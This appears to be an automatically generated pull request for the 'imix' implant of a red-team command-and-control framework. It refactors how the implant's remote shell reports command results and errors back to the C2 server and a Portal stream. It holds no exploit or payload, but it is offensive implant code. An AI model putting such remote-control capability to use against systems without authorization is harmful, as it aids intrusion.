### PR TITLE
feat(imix): Send shell task output with interpret() result

### DIFF
--- a/implants/imix/src/shell/manager.rs
+++ b/implants/imix/src/shell/manager.rs
@@ -6,7 +6,7 @@ use tokio::sync::mpsc;
 
 use eldritch::agent::agent::Agent;
 use eldritch::assets::std::EmptyAssets;
-use eldritch::{Interpreter, Printer, Span};
+use eldritch::{Interpreter, Printer, Span, Value};
 use pb::c2::{ReportTaskOutputRequest, ShellTask, ShellTaskOutput, TaskContext, TaskError};
 use pb::portal::{self, Mote, ShellPayload};
 use transport::Transport;
@@ -65,6 +65,95 @@ impl SharedShellContext {
     }
 }
 
+fn send_shell_output<T: Transport + Send + Sync + 'static>(
+    agent: &Arc<ImixAgent<T>>,
+    context: &SharedShellContext,
+    shell_id: i64,
+    output: String,
+) {
+    let ctx = context.0.lock().unwrap();
+
+    // 1. Report to C2 if task_id is present
+    if let Some(task_id) = ctx.task_id {
+        let req = ReportTaskOutputRequest {
+            shell_task_output: Some(ShellTaskOutput {
+                id: task_id,
+                output: output.clone(),
+                error: None,
+                exec_started_at: None,
+                exec_finished_at: None,
+            }),
+            ..Default::default()
+        };
+        let _ = agent.report_task_output(req);
+    }
+
+    // 2. Report to Portal if active
+    if let Some(tx) = &ctx.portal_tx {
+        let stream_id = ctx.stream_id.clone().unwrap_or_default();
+        // Use the seq_id from the incoming message to reply to the correct sequence/stream
+        let seq_id = ctx.seq_id.unwrap_or(0);
+
+        let payload = ShellPayload {
+            shell_id,
+            input: output,
+        };
+        let mote = Mote {
+            stream_id,
+            seq_id,
+            payload: Some(portal::mote::Payload::Shell(payload)),
+        };
+
+        let tx = tx.clone();
+        tokio::spawn(async move {
+            let _ = tx.send(mote).await;
+        });
+    }
+}
+
+fn send_shell_error<T: Transport + Send + Sync + 'static>(
+    agent: &Arc<ImixAgent<T>>,
+    context: &SharedShellContext,
+    shell_id: i64,
+    error: String,
+) {
+    let ctx = context.0.lock().unwrap();
+
+    if let Some(task_id) = ctx.task_id {
+        let req = ReportTaskOutputRequest {
+            shell_task_output: Some(ShellTaskOutput {
+                id: task_id,
+                output: String::new(),
+                error: Some(TaskError { msg: error.clone() }),
+                exec_started_at: None,
+                exec_finished_at: None,
+            }),
+            ..Default::default()
+        };
+        let _ = agent.report_task_output(req);
+    }
+
+    if let Some(tx) = &ctx.portal_tx {
+        let stream_id = ctx.stream_id.clone().unwrap_or_default();
+        let seq_id = ctx.seq_id.unwrap_or(0);
+
+        // Prefix error
+        let payload = ShellPayload {
+            shell_id,
+            input: format!("Error: {}", error),
+        };
+        let mote = Mote {
+            stream_id,
+            seq_id,
+            payload: Some(portal::mote::Payload::Shell(payload)),
+        };
+        let tx = tx.clone();
+        tokio::spawn(async move {
+            let _ = tx.send(mote).await;
+        });
+    }
+}
+
 struct ShellPrinter<T: Transport> {
     agent: Arc<ImixAgent<T>>,
     context: SharedShellContext,
@@ -81,82 +170,16 @@ impl<T: Transport> fmt::Debug for ShellPrinter<T> {
 
 impl<T: Transport + Send + Sync + 'static> Printer for ShellPrinter<T> {
     fn print_out(&self, _span: &Span, s: &str) {
-        let ctx = self.context.0.lock().unwrap();
-
-        // 1. Report to C2 if task_id is present
-        if let Some(task_id) = ctx.task_id {
-            let req = ReportTaskOutputRequest {
-                shell_task_output: Some(ShellTaskOutput {
-                    id: task_id,
-                    output: format!("{}\n", s),
-                    error: None,
-                    exec_started_at: None,
-                    exec_finished_at: None,
-                }),
-                ..Default::default()
-            };
-            let _ = self.agent.report_task_output(req);
-        }
-
-        // 2. Report to Portal if active
-        if let Some(tx) = &ctx.portal_tx {
-            let stream_id = ctx.stream_id.clone().unwrap_or_default();
-            // Use the seq_id from the incoming message to reply to the correct sequence/stream
-            let seq_id = ctx.seq_id.unwrap_or(0);
-
-            let payload = ShellPayload {
-                shell_id: self.shell_id,
-                input: format!("{}\n", s.to_string()),
-            };
-            let mote = Mote {
-                stream_id,
-                seq_id,
-                payload: Some(portal::mote::Payload::Shell(payload)),
-            };
-
-            let tx = tx.clone();
-            tokio::spawn(async move {
-                let _ = tx.send(mote).await;
-            });
-        }
+        send_shell_output(
+            &self.agent,
+            &self.context,
+            self.shell_id,
+            format!("{}\n", s),
+        );
     }
 
     fn print_err(&self, _span: &Span, s: &str) {
-        let ctx = self.context.0.lock().unwrap();
-
-        if let Some(task_id) = ctx.task_id {
-            let req = ReportTaskOutputRequest {
-                shell_task_output: Some(ShellTaskOutput {
-                    id: task_id,
-                    output: String::new(),
-                    error: Some(TaskError { msg: s.to_string() }),
-                    exec_started_at: None,
-                    exec_finished_at: None,
-                }),
-                ..Default::default()
-            };
-            let _ = self.agent.report_task_output(req);
-        }
-
-        if let Some(tx) = &ctx.portal_tx {
-            let stream_id = ctx.stream_id.clone().unwrap_or_default();
-            let seq_id = ctx.seq_id.unwrap_or(0);
-
-            // Prefix error
-            let payload = ShellPayload {
-                shell_id: self.shell_id,
-                input: format!("Error: {}", s),
-            };
-            let mote = Mote {
-                stream_id,
-                seq_id,
-                payload: Some(portal::mote::Payload::Shell(payload)),
-            };
-            let tx = tx.clone();
-            tokio::spawn(async move {
-                let _ = tx.send(mote).await;
-            });
-        }
+        send_shell_error(&self.agent, &self.context, self.shell_id, s.to_string());
     }
 }
 
@@ -211,6 +234,7 @@ impl<T: Transport + Send + Sync + 'static> ShellManager<T> {
     }
 
     async fn handle_task(&mut self, task: ShellTask) {
+        let agent = self.agent.clone();
         let shell_id = task.shell_id;
         let state = self.get_or_create_interpreter(shell_id);
 
@@ -219,13 +243,23 @@ impl<T: Transport + Send + Sync + 'static> ShellManager<T> {
             .context
             .set_task(task.id, task.sequence_id, task.stream_id);
 
-        let _ = state.interpreter.interpret(&task.input);
+        match state.interpreter.interpret(&task.input) {
+            Ok(value) => {
+                if !matches!(value, Value::None) {
+                    send_shell_output(&agent, &state.context, shell_id, format!("{:?}\n", value));
+                }
+            }
+            Err(e) => {
+                send_shell_error(&agent, &state.context, shell_id, e);
+            }
+        }
 
         state.context.clear_task();
     }
 
     async fn handle_portal_payload(&mut self, mote: Mote, reply_tx: mpsc::Sender<Mote>) {
         if let Some(portal::mote::Payload::Shell(shell_payload)) = mote.payload {
+            let agent = self.agent.clone();
             let shell_id = shell_payload.shell_id;
             let stream_id = mote.stream_id.clone();
             let seq_id = mote.seq_id;
@@ -235,7 +269,21 @@ impl<T: Transport + Send + Sync + 'static> ShellManager<T> {
             state.last_activity = Instant::now();
             state.context.set_portal(reply_tx, stream_id, seq_id);
 
-            let _ = state.interpreter.interpret(&shell_payload.input);
+            match state.interpreter.interpret(&shell_payload.input) {
+                Ok(value) => {
+                    if !matches!(value, Value::None) {
+                        send_shell_output(
+                            &agent,
+                            &state.context,
+                            shell_id,
+                            format!("{:?}\n", value),
+                        );
+                    }
+                }
+                Err(e) => {
+                    send_shell_error(&agent, &state.context, shell_id, e);
+                }
+            }
         }
     }
 


### PR DESCRIPTION
This PR updates the `imix` shell manager to capture and report the return value of interpreted shell commands. Previously, the result of `interpret()` was ignored. Now, if the result is not `Value::None`, it is formatted using `{:?}` (Debug) and sent to both the C2 server and the active Portal stream. This aligns the remote shell behavior with local REPLs and allows users to see the output of expressions like `1+1` or `process.list()` without needing an explicit `print()`. It also ensures that runtime errors during interpretation are reported as task errors.

---
*PR created automatically by Jules for task [10491316157999478614](https://jules.google.com/task/10491316157999478614) started by @KCarretto*